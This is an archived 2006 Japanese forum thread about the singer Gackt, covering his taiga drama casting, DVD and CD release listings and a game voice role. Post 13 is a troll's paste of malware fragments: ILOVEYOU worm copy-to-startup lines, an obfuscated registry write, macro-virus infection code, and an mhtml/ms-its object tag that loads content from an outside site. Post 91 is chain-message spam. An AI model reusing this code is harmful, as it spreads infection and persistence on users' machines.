5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Gackt 165

1 :NO MUSIC NO NAME:2006/07/26(水) 04:35:08 ID:/BqObo+w
【Gacktスレ本家】
Gackt氏の総合的な情報・話題を語る場です。
基本的にソースのない話題は禁止。
話したい場合は>>2-5辺りにある関連スレへどうぞ。


2007年NHK大河ドラマに上杉謙信役で出演決定
ttp://www.nhk.or.jp/drama/html_news_fuurin.html


前スレ
Gackt 164
http://music5.2ch.net/test/read.cgi/musicjm/1151319033/

Gackt関連スレ過去ログINDEX
http://gackty.chu.jp/

スレッドに書き込む人は必ず>>1-10辺りを読んでから参加してください。
特に以下のルールは厳守してください。

・荒らし・煽り・厨房・Gacktに関係しない話題は【完全無視】で【マターリ】と。
・このスレは【sage進行】です。メール欄に半角でsageと書き込みましょう。
・【過度の馴れ合い】は他の参加者に迷惑になります。ファンサイトでやってください。

2 :NO MUSIC NO NAME:2006/07/26(水) 04:35:50 ID:/BqObo+w
・テレビ等を見ながらの【実況は禁止】されています。実況板にてお願いします。
・【ライヴのネタバレは禁止】です。語りたい方は楽しみスレ@V系板にてお願いします。
・本家にて話すべきでない話題は禁止。【x ガクトプライベートメール】【x 交友関係】【x

ソースの無い話】
・教えて厨、わがまま厨は甘やかさないように!
・うpに関しては、質問NG。

このスレはGacktスレ本家(×ソースなし話題、×LiVEネタバレ)です。
以下の話題は関連スレへGO!

◆Gacktの世界を分析・議論したい方、LIVEネタバレ情報は【Gacktの楽しみ方】@ヴィジュアルバンド板スレへ
http://music4.2ch.net/visualb/ ←ここで検索
◆私生活ネタ、噂話は【Gacktで井戸端会議】@芸能有名人板スレへ
http://tv7.2ch.net/geino/ ←ここで検索
◆Gackt公式サイト  (曲の試聴はTUTAYAのサイトで出来ます)
ttp://www.dears.ne.jp/
◆Gacktの楽曲視聴(全アルバム収録曲を視聴できます。)−OnGenサイト
ttp://www.ongen.net/domestic/artist/feature/gackt/index.php

*注意*

Gacktスレには粘着荒らしが居ます。いろいろな手口を使いあなたのレスを誘ってきます。
「なにこいつ?」と思ったら熱くなる前に、書き込む前に一呼吸。

【こんなレスは怪しい?】
・他アーティストとの売り上げ比較。ex.Luna seaはミリオンだがGacktは・・・など
・根拠の無い非難。ex."歌唱力がない"、"演奏が下手"、"曲が糞"・・・など
・即レス
・荒らしのレスに対して同意したり、またつまらない煽りのレスをつける・・・など

粘着荒らし・アンチを発見した場合は【 完 全 無 視 】でお願いします。
【避難スレへの誘導】も【注意】も必要ありません。
荒らしが【自演】してあなたのレスを誘っている可能性があります。

放置してゴミが貯まったら捨てればいいのです。
レスをつけると削除人さんが削除してくれませんし、削除依頼も面倒になります
スレの健全化のために【 徹 底 無 視 】しましょう。
また荒らしを見つけたら【 書 き 込 み を 控 え る の も 手 で す 】

人が居ないとわかれば、荒らしはどこかへ消えます。

以上

3 :NO MUSIC NO NAME:2006/07/26(水) 04:36:24 ID:/BqObo+w
何か、忘れたり間違えてたらスマン

4 :NO MUSIC NO NAME:2006/07/26(水) 08:56:25 ID:fZ/lsVUr



5 :NO MUSIC NO NAME:2006/07/26(水) 10:23:40 ID:1w/u/CZ2
>1
乙!

6 :NO MUSIC NO NAME:2006/07/26(水) 12:02:18 ID:VKb0Pfih
【決定キャスト】

山本勘助/内野聖陽
武田信玄/市川亀治郎
上杉謙信/Gackt
由布姫/柴本幸
三条夫人/池脇千鶴
板垣信方/千葉真一
大井夫人/風吹ジュン
武田信虎/仲代達矢

萩乃(三条夫人の女中頭)/浅田美代子
真田幸隆/佐々木蔵之介
忍芽(幸隆の妻)/清水美砂
禰々(信玄の妹)/桜井幸子
北条氏康/松井誠
今川義元/谷原章介
飯富虎昌/金田明夫
甘利虎泰/竜雷太

藤村志保
市川左團次
高橋和也
田辺誠一
嘉島典俊

7 :NO MUSIC NO NAME:2006/07/26(水) 15:58:02 ID:FdmryiaQ
2007年NHK大河ドラマ 風林火山

【決定キャスト】

山本勘助/内野聖陽
武田信玄/市川亀治郎
上杉謙信/Gackt
由布姫/柴本幸
三条夫人/池脇千鶴
板垣信方/千葉真一
大井夫人/風吹ジュン
武田信虎/仲代達矢

萩乃(三条夫人の女中頭)/浅田美代子
真田幸隆/佐々木蔵之介
忍芽(幸隆の妻)/清水美砂
禰々(信玄の妹)/桜井幸子
小山田信有/田辺誠一
教来石政景/高橋和也
武田信繁/嘉島典俊
北条氏康/松井誠
今川義元/谷原章介
飯富虎昌/金田明夫
甘利虎泰/竜雷太
寿桂尼/藤村志保
上杉憲政/市川左團次


8 :NO MUSIC NO NAME:2006/07/26(水) 16:16:07 ID:TL9Y8jXX
かなり玄人好みのキャストだね

9 :NO MUSIC NO NAME:2006/07/26(水) 16:47:47 ID:a+/ni5Pa
池脇ってΖでもチョロチョロしてなかったか?
なんか二部でサラの声優やって、三部でいきなり降板して他の声優になってたけど
元の声優さんが可哀想だと思った

10 :NO MUSIC NO NAME:2006/07/26(水) 18:25:12 ID:3quRPGo8
>>9
いや、もっと可哀想な声優いたからw


11 :NO MUSIC NO NAME:2006/07/26(水) 18:56:05 ID:xkDwfZSq
ビデオクリップ集DVD 2タイトル同時リリース
*初回生産分封入特典「Gackt Art Works Gift Card」

Gackt GREATEST FILMOGRAPHY 1999-2006〜RED〜
<収録楽曲>
ANOTHER WORLD/OASIS/Secret Garden/REDEMPTION/
Mizerable/BLACK STONE/鶺鴒〜sekirei〜/Vanilla/
君が追いかけた夢/Mirror/忘れないから/Metamorphoze
2006年08月23日発売 CRBP-10045 ¥3,150

Gackt GREATEST FILMOGRAPHY 1999-2006〜BLUE〜
<収録楽曲>
再会〜Story〜/君のためにできること/月の詩/君が待っているから/
届カナイ愛ト知ッテイタノニ抑エキレズニ愛シ続ケタ…/
12月のLove Song/Last Song(UNPLUGGED)/君に逢いたくて/
ありったけの愛で/Last Song/Mirror(UNPLUGGED)/Love Letter
2006年08月23日発売 CRBP-10046 ¥3,150


12 :NO MUSIC NO NAME:2006/07/26(水) 18:57:10 ID:xkDwfZSq
デカジャケCDシリーズ「Gackt Premium Collection」5週連続リリース
*ディスク:SACD hybrid(スーパーオーディオCDハイブリッド)仕様
*ジャケットサイズ:縦31cm×横31cm(LPサイズ・紙製ダブルジャケット仕様)
*ブックレットサイズ:縦30cm×横30cm
*封入特典 B2サイズポスター (初回限定生産)

2006年10月25日発売 「MARS」 CRGP-40001 \3,800
2006年11月01日発売 「Rebirth」 CRGP-40002 \3,800
2006年11月08日発売  「MOON」 CRGP-40003 \3,800
2006年11月15日発売 「Crescent」 CRGP-40004 \3,800
2006年11月22日発売 「DIABOLOS」 CRGP-40005 \3,800

13 :NO MUSIC NO NAME:2006/07/26(水) 19:51:52 ID:guGtukJh
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

14 :NO MUSIC NO NAME:2006/07/26(水) 19:59:00 ID:FdmryiaQ
ウイルス注意!

15 :NO MUSIC NO NAME:2006/07/26(水) 20:16:16 ID:CXYbEZKd
このスレって立つと必ずウイルス貼られるね。

16 :NO MUSIC NO NAME:2006/07/26(水) 20:20:52 ID:ZPyeId6i
とうとうウィルス貼るしかなくなったんだな、のんさ、哀れ。

17 :NO MUSIC NO NAME:2006/07/26(水) 21:28:17 ID:G9p4P/H/
今日デアズロゴトラック見たぞ

18 :NO MUSIC NO NAME:2006/07/26(水) 21:45:25 ID:JWvOGizH
トリビアでちらっとLONGINGのイントロが流れた気がする
ジャポニカ学習帳あたりで

19 :NO MUSIC NO NAME:2006/07/26(水) 22:30:21 ID:VKb0Pfih
大河そろそろ撮影に入るから今年は新曲無理かな

20 :NO MUSIC NO NAME:2006/07/26(水) 22:31:08 ID:VKb0Pfih
来年に期待

21 :NO MUSIC NO NAME:2006/07/26(水) 23:00:12 ID:jHRUI9US
>>17
運ちゃんがガクヲタ?
見てみたいなぁ〜。

22 :NO MUSIC NO NAME:2006/07/27(木) 11:44:46 ID:nJTGRua9
グッズ関係が名古屋の会社。普通にDearsトラックいつも走ってる。珍しくないよ。

23 :NO MUSIC NO NAME:2006/07/27(木) 12:01:53 ID:qi4nQ95P
昨日の世界仰天で中居がガクの名前を出したな。しっかりガクの顔写真付きだった。

24 :NO MUSIC NO NAME:2006/07/27(木) 13:29:49 ID:ougE0xST
>>23
kwsk

25 :NO MUSIC NO NAME:2006/07/27(木) 14:21:22 ID:n2sbabrY
>>18
仲間発見!!
LONGINGのイントロ流れたよね〜。

26 :NO MUSIC NO NAME:2006/07/27(木) 15:56:46 ID:s6tzjhSQ
>>24
23ではないが、出演していた夏川純が本名を聞かれて秘密だと答えたので
中居がGacktみたいだと言ったんだよ。

27 :NO MUSIC NO NAME:2006/07/27(木) 16:23:47 ID:ougE0xST
>>26
d!
名前出してくれただけでもありがたいな

28 :NO MUSIC NO NAME:2006/07/27(木) 21:51:16 ID:39zpjmDG
>>11 REDの方が良い曲入ってるな

29 :NO MUSIC NO NAME:2006/07/27(木) 22:53:00 ID:AnKWCasT
>>22
そういや通ってた学校が近かったな

30 :NO MUSIC NO NAME:2006/07/27(木) 23:45:04 ID:39zpjmDG
GacktとSMAPのライブの舞台監督一緒の人らしいよ

31 :NO MUSIC NO NAME:2006/07/27(木) 23:46:38 ID:WuUH421n
http://id28.fm-p.jp/15/ginneko0830/

32 :NO MUSIC NO NAME:2006/07/27(木) 23:52:00 ID:grF/Y+l+
ジャニーズと一緒て…

33 :NO MUSIC NO NAME:2006/07/27(木) 23:58:13 ID:8RAjxpEa
ここ見れないって人多いけどなんでかな〜
普通に見えるんだけど

34 :NO MUSIC NO NAME:2006/07/28(金) 00:26:56 ID:2rxrKOGw
ウイルスが貼られたせいでしょ
13に貼ってあるからソースのところを14以降にすれば見られるよ

35 :NO MUSIC NO NAME:2006/07/28(金) 07:07:05 ID:Q7FWFfYi
自称Gackt
優奈 ◆JIRO6EjfgE http://p.pita.st/?m=f4xghimx
鯛板(もてたい男板)にいます

唇に注目するとブサイクだとよく分かります


36 :NO MUSIC NO NAME:2006/07/28(金) 07:33:26 ID:ZREwrUv/
>>19
いや、いくらなんでも今年中に1曲ぐらいは・・・。

37 :NO MUSIC NO NAME:2006/07/28(金) 07:41:37 ID:5rCcNnAv
>>30
舞台監督って浅野さん?

38 :NO MUSIC NO NAME:2006/07/28(金) 14:33:12 ID:mlojLPgp
今年紅白確実に出るね

39 :NO MUSIC NO NAME:2006/07/28(金) 14:40:02 ID:+i+Xd1LZ
大河ドラマに出るより新曲だして欲しいと思うのは自分だけか…?
いや、大河に出るのも喜ばしいことだとは思うんだけど、歌を聴きたい
ゲームのボイス収録もあるし、これは本格的に今年は諦めるしかないか

40 :NO MUSIC NO NAME:2006/07/28(金) 14:40:03 ID:+nPA8+nM
マジ(´・ω・`)

41 :NO MUSIC NO NAME:2006/07/28(金) 16:13:53 ID:iq/GSyaZ
PSPって声出んの?
撮影前に緊張してまたお腹壊してそう

42 :NO MUSIC NO NAME:2006/07/28(金) 16:35:42 ID:+0D7sbiX
楽って今はひとり暮らしなの?

43 :NO MUSIC NO NAME:2006/07/28(金) 18:31:37 ID:jaWNao5p
なんでPSPなんだよ
DSしか持ってねぇよ

44 :NO MUSIC NO NAME:2006/07/28(金) 18:48:42 ID:CIyAfOxh
>>43
同じく…orz

45 :NO MUSIC NO NAME:2006/07/28(金) 18:59:47 ID:WEGx+J9r
ゲームのボイス情報ってどこからの情報?

46 :NO MUSIC NO NAME:2006/07/28(金) 19:21:27 ID:+i+Xd1LZ
>>45
どこからって…。
PSPのCRISIS COREだよ。このゲームにボイスが付くことは決定してるし、
メインキャラの一人だし、一人だけ声が付かないなんて事はないだろ。

47 :NO MUSIC NO NAME:2006/07/28(金) 21:34:10 ID:WYk+kh0L
>>32
淺野氏はハロプロも受け持ってますが、何か?


>>37
池田さんの方だよ

48 :NO MUSIC NO NAME:2006/07/28(金) 21:42:20 ID:WEGx+J9r
>>46
ありがとう。
でもゲームファンじゃない限りそこまで詳しく知らないよ。

49 :NO MUSIC NO NAME:2006/07/28(金) 21:50:02 ID:+i+Xd1LZ
>>48
ごめん。自分あっちの住民でもあるんで知ってると思い込んでた。
役はこないだの冬に出た実写のやつと同じキャラね。Gことジェネシス

50 :NO MUSIC NO NAME:2006/07/29(土) 00:06:37 ID:2rxrKOGw
リデンプがリリースされてから半年。
今年はもう音楽活動自体がなしかもね。

51 :NO MUSIC NO NAME:2006/07/29(土) 01:03:35 ID:wYHEOaew
日記で暴れると言ってたから何かありそうなんだけどな


52 :NO MUSIC NO NAME:2006/07/29(土) 01:52:29 ID:Ryf1iEkr
>>39
気持ちもわかるけど、
Gacktが大河を通して、色んな意味で表現力に箔が付いた後で、
曲作ってくれたほうが俺は嬉しいよ。
Diabolosの流れのままシングル作り続けてたら、
次のベストアルバムが心配。
ま、そんなのは俺だけだろうが。

53 :NO MUSIC NO NAME:2006/07/29(土) 01:56:22 ID:PzN9Kbc+
>>50こないだの冬の実写…


武刃街だか武刄街だか武仭街だっけ?

54 :NO MUSIC NO NAME:2006/07/29(土) 01:58:12 ID:JRVVYE7o
そういやGacktのゲームあったな

55 :NO MUSIC NO NAME:2006/07/29(土) 03:01:59 ID:Bh60a2c9
>49
ジェネシスの声、Gacktがやるとは限らないんじゃないの?
DCFF7の雑誌インタビューで、キャラは後のゲームに続くけど、
自分が係わるかどうかはわからないと言ってたよ
正式に発表あったの?

56 :NO MUSIC NO NAME:2006/07/29(土) 03:36:59 ID:oEfUBnss
>>55
うーん、そう言われると確かにそうなんだけど、その後の流れから言って
キャスト変更は今んとこなさそうに見えるよ
E3もあったし、その後CCのインダビュー諸々でもそれらしい話はまったく出てない
引き続きGacktが当てるのが自然な流れじゃないかな、と言うところで落ち着いてるんだけど…
実在の人をモデルにして、その人は声優も未経験ではなくて、一度当人が当てた役を
改めて別の人がやるって言うほうがどっちかって言うと変じゃない?

>>53
ちげーよwwwwwww

57 :NO MUSIC NO NAME:2006/07/29(土) 03:40:12 ID:oEfUBnss
あ、盛大に勘違いしてることに気が付いた
その「後のゲーム」はCCのことじゃなくて、DCの続編のこと
その続編自体が出るかどうか決まってない
構想はあるらしいが、もし出るとしても数年先

58 :NO MUSIC NO NAME:2006/07/29(土) 05:06:44 ID:chx2N+ZC
なにこのキモい流れ。
アキバ臭いよ。

59 :NO MUSIC NO NAME:2006/07/29(土) 05:19:38 ID:hP6Xp3jW
Gacktがアキバ臭いのに出てるんだから仕方ない。
しかしDCはつまらんかったな。

60 :NO MUSIC NO NAME:2006/07/29(土) 05:43:50 ID:kioaOchG
ゲームの内容としてはアキバ系の人達みたく専門家にはつまらなかったかもね?私もすぐクリアしたけどGacktが一体どんなキャラを演じたのか知りたかったから買っただけだし。

61 :NO MUSIC NO NAME:2006/07/29(土) 07:04:50 ID:oEfUBnss
ちょっとゲームの話しただけで、しかもGacktに関することだけなのにアキバ系って…
そんなこと言われたの初めてだ。どんな認識だよ。

62 :NO MUSIC NO NAME:2006/07/29(土) 08:33:46 ID:kioaOchG
61 そうだよね、ゴメンね。

63 :NO MUSIC NO NAME:2006/07/29(土) 09:15:46 ID:R6WzGu9T
おまえは真の秋葉系を知らない

64 :NO MUSIC NO NAME:2006/07/29(土) 09:19:26 ID:kioaOchG
63 うん、知らないケド別に知らなくていいかなぁw

65 :NO MUSIC NO NAME:2006/07/29(土) 09:27:24 ID:chx2N+ZC
>>63
べつにアキバ系知りたくないからWWW

66 :NO MUSIC NO NAME:2006/07/29(土) 10:01:21 ID:R6WzGu9T
>>65
お前は知りもしない物を引き合いに出し差別的に侮辱するのか。
Gacktを傷つけたマスゴミと変わりないな、お前。

67 :NO MUSIC NO NAME:2006/07/29(土) 10:55:16 ID:gLlBDwf3
>>52
Diabolosは一応あれで終わったかと思ったんだが
どうなんだろう
同時進行してたっていうアルバムが気になる


68 :NO MUSIC NO NAME:2006/07/29(土) 11:04:30 ID:chx2N+ZC
>>66
はいはいワロスWWW

69 :NO MUSIC NO NAME:2006/07/29(土) 11:13:36 ID:wYHEOaew
色々と楽しみだ
しかし楽しむまでに時間かかるんだな

70 :NO MUSIC NO NAME:2006/07/29(土) 11:43:41 ID:gZj5BXcb
DVD持ってるのにBS-iで放映するムンチャを午後マターリと見ます

71 :NO MUSIC NO NAME:2006/07/29(土) 12:11:31 ID:hMkbEUnV
>>68が可哀想に見えてきた…

72 :NO MUSIC NO NAME:2006/07/29(土) 12:55:15 ID:pmPjHOPl
夏休みだから仕方ないよ。


73 :NO MUSIC NO NAME:2006/07/29(土) 13:01:17 ID:chx2N+ZC
だって最近の流れがキモいんだもん。
ごめんねW

74 :NO MUSIC NO NAME:2006/07/29(土) 13:44:53 ID:nzsnzmNj
夏休み中ずっとこんな流れなのか…

75 :NO MUSIC NO NAME:2006/07/29(土) 14:02:22 ID:4QyjxDao
キモイ野村ヲタがこんなところにも生息してるのか

76 :NO MUSIC NO NAME:2006/07/29(土) 14:08:26 ID:LjnWBg9w
Gacktもオタだからしょーがねーよ

77 :NO MUSIC NO NAME:2006/07/29(土) 14:09:42 ID:chx2N+ZC
ヲタはスレ違いなわけで。

78 :NO MUSIC NO NAME:2006/07/29(土) 14:12:06 ID:ZZNqLSGE
Gackt大河外され…

79 :NO MUSIC NO NAME:2006/07/29(土) 14:21:49 ID:nzsnzmNj
chx2N+ZCのレス見てて気になったんだけどwとW間違えてるよ
ひょっとして初心者?

80 :NO MUSIC NO NAME:2006/07/29(土) 15:41:42 ID:shaOfesc
>>79
小心者

81 :NO MUSIC NO NAME:2006/07/29(土) 15:47:30 ID:t2QW4pNg
このスレヤオイ女がホモ妄想派閥でキモい喧嘩してるカスゲースレに晒されてますよ

82 :NO MUSIC NO NAME:2006/07/29(土) 15:54:12 ID:u1KC5TJb
夏だから喧嘩腰になるのは仕方ないのかもね。暑いし。

83 :NO MUSIC NO NAME:2006/07/29(土) 16:44:53 ID:m9/4QNtF
昨日の読売新聞朝刊に市川亀治郎さんの
インタビュー掲載されてた。で、大河の
撮影は9月から一年らしい。
Gacktはどのくらい入るのかな。

84 :NO MUSIC NO NAME:2006/07/29(土) 16:55:26 ID:u1KC5TJb
>>83
情報トンクス!
9月からかぁ・・
8月からかと思ってたのに。
それまでに新曲出るかな?

85 :NO MUSIC NO NAME:2006/07/29(土) 17:57:26 ID:wYHEOaew
原作では最後の方しか謙信はでないんだよね。しかも若いw
大河だと最初にチョロっと川中島の合戦の模様出して
あとは当分お預けな気もする

86 :NO MUSIC NO NAME:2006/07/29(土) 18:05:44 ID:nzsnzmNj
それ大河スレでも言われてたね、今までの大河も初回にメインとなる場面を
持ってくるパターンが多かったから、多分そうなりそうだよね
今回の大河は原作には無い主人公の若い頃からやるみたいだし、
謙信も今回メインの1人だから出番は増やすんじゃないかな

87 :NO MUSIC NO NAME:2006/07/29(土) 19:49:49 ID:izi//Lsc
色んな経験した方が良い曲作れるかもね最近の曲や詞はマンネリ気味だったから特に

88 :NO MUSIC NO NAME:2006/07/29(土) 20:04:07 ID:a8hOegZ0
かなりいろんな経験してると思うけど、ガクトって。
それでもまだ足らんの?

89 :NO MUSIC NO NAME:2006/07/29(土) 20:29:13 ID:pmPjHOPl
わざとageてるやつなんか相手にしないほうがいいよ。

90 :NO MUSIC NO NAME:2006/07/29(土) 20:53:52 ID:kbI30BS6
当番どうかした?

91 :NO MUSIC NO NAME:2006/07/29(土) 22:04:47 ID:OxcELZlx
ようこそ、バーボンハウスへ。(´・ω・`)
突然だけれども、ここを訪れた君に一生セクロス出来ない呪いをかけたよ。
ああ、君が怒るのも無理はない。
このテキーラはサービスだから、まず飲んで落ち着いて欲しい。
この呪いから逃れる方法はただ一つ、
http://love3.2ch.net/test/read.cgi/pure/1153122405/l50
のスレに
>>1振られたんだね(プゲラ
ザマーミロwwwwww」

と書き込み、このレスをほかの場所500箇所に貼ってほしいんだ。
うん、重ね重ね強引なのはわかっている。済まない。
仏の顔もって言うしね、謝って許してもらおうとも思っていない。
じゃあ、注文を聞こうか。


92 :NO MUSIC NO NAME:2006/07/29(土) 23:33:36 ID:xOtaJf9e
Newアルバムなりシングルなりだして欲しいな。

93 :NO MUSIC NO NAME:2006/07/30(日) 01:10:19 ID:9IaEpgX6
夏厨ウザイ。
自分のブログでも作ってそこでやれよ、ボケ共が。

>284 名前: 名前が無い@ただの名無しのようだ [sage] 投稿日: 2006/07/29(土) 10:48:00 ID:DpsxNCvp0
>LEプレイ動画来たよ!!
>ttp://www.youtube.com/watch?v=gh5D2fjeeVQ

>とりあえず出演確定キャラはヴィンセントとルクレツィア。
>一番最初のミッションはガーゴイルを打ち落とすみたい。(PS2版みたいに戦後評価あり)
>正直携帯でこんなんできるのかって驚いた…

北米のみで公開予定のDCFF7携帯コンテンツの動画レポ。
まぁ、携帯ゲームなんてどうでもいい。
一番大きいのは北米でもREDEMPTIONがそのまま使われるって事だ。

94 :NO MUSIC NO NAME:2006/07/30(日) 03:08:46 ID:uISqM8+E
>93
このようつべのタイトル
「Final Fantasy VII Dirge of Cerberus Lost Episode」

エキサイトで翻訳したら
「ケルベロスの最終的な幻想VII葬送歌はエピソードを失いました。」ってなった
どーゆー意味?


95 :NO MUSIC NO NAME:2006/07/30(日) 03:34:11 ID:bf8wN+C6
夏厨氏ね

96 :NO MUSIC NO NAME:2006/07/30(日) 03:59:31 ID:1Jzfg2T/
>>94
直訳わろす
因みにFinal Fantasy VII Dirge of Cerberus はゲームのタイトルだから。
略してFF7DCとかDCって書く。
とか説明してたらまたアキバ系のキモヲタ扱いされるかw

97 :NO MUSIC NO NAME:2006/07/30(日) 04:24:38 ID:1Jzfg2T/
↑Gacktが出てたゲームのタイトルって書いたつもりが抜けてた。
DCもLEも単にゲームのタイトルでGacktとは関係ないし、
FFキャラやストーリーを知らなければ意味理解できんので、知りたきゃFF板へドゾー。

98 :NO MUSIC NO NAME:2006/07/30(日) 10:27:08 ID:q5R7p8Di
FFは最終的な幻想ではなく究極の幻想とう意味

99 :NO MUSIC NO NAME:2006/07/30(日) 15:48:47 ID:RyHxOaf1
FFの名を借りで糞コンピ連発するなボケ

100 :NO MUSIC NO NAME:2006/07/30(日) 16:20:06 ID:u6AKRPcW
確かにFFの意味なんてのはどうでもいいな
FF板とやらで思う存分語ってくれ

208 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)